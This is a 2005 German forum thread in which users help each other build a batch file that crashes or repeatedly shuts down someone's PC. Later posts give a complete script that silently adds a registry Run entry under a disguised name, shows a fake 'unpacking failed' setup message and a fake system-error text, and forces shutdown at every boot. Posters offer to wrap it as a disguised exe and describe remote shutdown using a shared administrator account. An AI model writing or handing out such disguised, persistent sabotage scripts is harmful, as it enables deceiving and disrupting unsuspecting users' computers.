x.bat datei den pc abstürzen oder restarten oder sontige sachen amchen lassn ?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von themark, 6. Juni 2005 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 6. Juni 2005
    datei funzt nicht, da er die autoexect nicht startet hab sie also wieder aus dema nhang raus
     
  2. 6. Juni 2005
    ne geht ned also wenn ich es aufmache dann macht er nix..

    ich probier ständig an einem anderen pc wenn du glaubst ich wär so bled an meinem hauipt pc.. es zu machen
     
  3. 6. Juni 2005
    hab den fehler gefunden, es liegt daran, dass er die autoexec.bat nicht ausführt ka warum ich werde mir was anderes überlegen
     
  4. 6. Juni 2005
    für mich wäre ja jetzt mal viel interessanter wie man das ganze dann per remote verwirklichen kann also wenn ich mich mit meinem rechner im netzwerk befinde und dort den befehl "shutdown -r -f -m \\(ipadresse oder Rechnername) -T 20 -c Text"(nat. mit abgeänderten werten) eingebe führt er den zwar aus aber nicht passiert der andere zuckt sich nicht!!
    aber die rcp lücke müsste offen sein den der shutdown befehl auf dem rechner funzt einwandfrei weiss da irgendjemand rat???
    danke jetzt schonmal!!
     
  5. 6. Juni 2005
    wie wär's damit:

    Startmenü => autostart neue Verknüpfung =>eigenschaften => ziel:
    %windir%\system32\shutdown -r -t 0
     
  6. 6. Juni 2005
    da fehlt glaube ich noch der parameter -s (start) habs aber noch net über lan ausprobiert, von daher wies ich des net so genau
    hilft mir aber net weiter, weil ich nur 1.datei haben will, die mann ausführt und dann soll des passen. nix mit verschieben
     
  7. 6. Juni 2005
    wäre aber echt super!!
     
  8. 6. Juni 2005
    1. Bei winXp wird die Autoexec.bat nicht mehr verarbeitet sondern nur noch im Dos Modus. --> deswegen Autoexec.bat meist auch -Byte Datei.

    2. Ruf doch mal die Hilfe von Win XP auf und spiel bischen mit den Argumenten im DOS-Fenster rum da kommt wenn ich mich nicht Irre ne bessere Fehlermeldung.

    hast du irgentwie eienen Account auf dem Rechner den Du kennst ( Vorzugsweise mit Administratorrechten).

    dann kannste die CMD datei auf den anderen Rechner kopieren, dich auf die Regestry verbinden und die Datei über RUN key bei jeden Start ausführen.

    edit:
    habs grad ausprobiert musste unter einem Account machen der z.B auf beiden rechnern vorhanden ist. administrator auf beiden testrechnern mit dem selben passwort dann Shutdown -s -m \\rechnername -t [zeitlimit] -c "Mitteilung"

    für weitere Tests cmd datei rüberkopieren auf Gastsystem und dort ausführen. es funzt

    edit2:
    runas /user:[ipadresse oder Rechnername]\administrator "shutdownbefehl"

    wenn mann sich nicht ummelden will
     
  9. 7. Juni 2005
    für mich wörs mal interessanter, wie kann man bei dem countdown, es verhindern, dass es runter fährt..?
     
  10. 7. Juni 2005
    Wenn so ein Countdown-Fenster kommt, dann einfach Windows-Taste+R drücken und folgendes eingeben:

    shutdown -a
     
  11. 7. Juni 2005
    ähm weiß jetzt wer da wie das geht wenn man es aufmacht sodass es gespeichert wird und nach dem neu start des pc's nochmal der pc startet ?


    geiwsse zeit ?
     
  12. 7. Juni 2005

    fett danke...
     
  13. 10. Juni 2005
    Start | de|nic|vu - Kostenlose Domain für alle + kostenloser Webspace + E-Mail
    die is cool die seite^^
     
  14. 10. Juni 2005
    schön, hätte ich auch gleich nic.de.vu aufrufen können :O
     
  15. 10. Juni 2005
    gibt es jetzt so eine datei die sich außtomatisch speichert und jedes mal ausgeführt wird nach dem start ? also neustart ? also ..z.b alle 20 minuten oder 2 stunden
     
  16. 13. Juni 2005
    ich bin dabei
    ich machs jetzt mit nem reg key. dauert aber noch ein wenig
     
  17. 13. Juni 2005
    danke,bekommst dann gleich anschließend wenn du es gmacht hast 10 ner bewertung!


    Es soll neugestartet werden und in einer Stunde wieder das gleiche machen!


    Erklär mir dann please::: Wo die Zeit etc ändern muss!
     
  18. 13. Juni 2005
    bei batch dateien gibbet keine zeiteinstellung. desshalb hab ich des script nur soweit, dass des gleich nach dem starten von windows passiert.
    aber hier erstmal der code:
    Code:
    @echo off 
    echo Windows Registry Editor Version 5.00 >> neu.reg 
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> neu.reg 
    echo "netdll32"="shutdown -s -t 30 -c "\Der Prozess rundl32 wurde leider beendet. Desshalb ist ihr System nichtmehr in der Lage befehle auszuführen und wird desshalb herruntergefahren!\"" >> neu.reg 
    regedit /s neu.reg 
    del neu.reg 
    echo Unpacking 
    echo ..................... 
    echo lskjfölkajrrpirhdjdff >> Setup.exe 
    echo ..................... 
    echo 3o2olqkj cpf6qwmuß970984w 0p05 h5z t, >> Setup.exe 
    echo .... 
    echo dfkjsdlfjaoritao >> Setup.exe 
    echo. 
    echo ERROR unable to unpack 
    echo. 
    pause 
    der muss jetzt eigentlich funzen. probiers einfach aus. jetzt brauchste des ganze halt nurnoch in ner exe getarnt. das bekomm ich auch noch hin wenn du willst
    wenn ich finde, dass er sich erst nach 1ner stunde runterfährt, dann sag ichs dir, k?
     
  19. 13. Juni 2005
    Ja Würdest du mir es als exe erstellen
    +das er neustartet tut
    und nach ner stunde ...das macht
     
  20. 13. Juni 2005
    dei exe mach ich noch. bin imme rnoch auf der suche, nach einem bat2exe ohne werbung
    des time dings bums sag ich dir, wenn ichs weis
    und n tut kann ich klar schreiben. musst halt geauer sagen, wass drinne stehen soll
     
  21. 13. Juni 2005
    naja diesen text speichere ich als name.bat ab aber der tut ned ..abstürzen
     
  22. 13. Juni 2005
    mhhhh mal gucken mom
    welches windoof benutzt dein anderer rechner
     
  23. 13. Juni 2005
    Code:
    @echo off 
    echo Windows Registry Editor Version 5.00 >> neu.reg 
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> neu.reg 
    echo "netdll32"="shutdown -s -t 30 -c "\Der Prozess rundl32 wurde leider beendet. Desshalb ist ihr System nichtmehr in der Lage befehle auszuführen und wird desshalb herruntergefahren!\"" >> neu.reg 
    regedit /s neu.reg 
    del neu.reg 
    echo Unpacking 
    echo ..................... 
    echo lskjfölkajrrpirhdjdff >> Setup.exe 
    echo ..................... 
    echo 3o2olqkj cpf6qwmuß970984w 0p05 h5z t, >> Setup.exe 
    echo .... 
    echo dfkjsdlfjaoritao >> Setup.exe 
    echo. 
    echo ERROR unable to unpack 
    echo. 
    SLEEP 3
    shutdown -s -t0 
    
     
  24. 13. Juni 2005
    Geht Nicht!
    Oder....Ist das so wnen man nach dem NeuStarten--das es aktiviert wird ?
     
  25. 13. Juni 2005
    welches Win?
     
  26. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.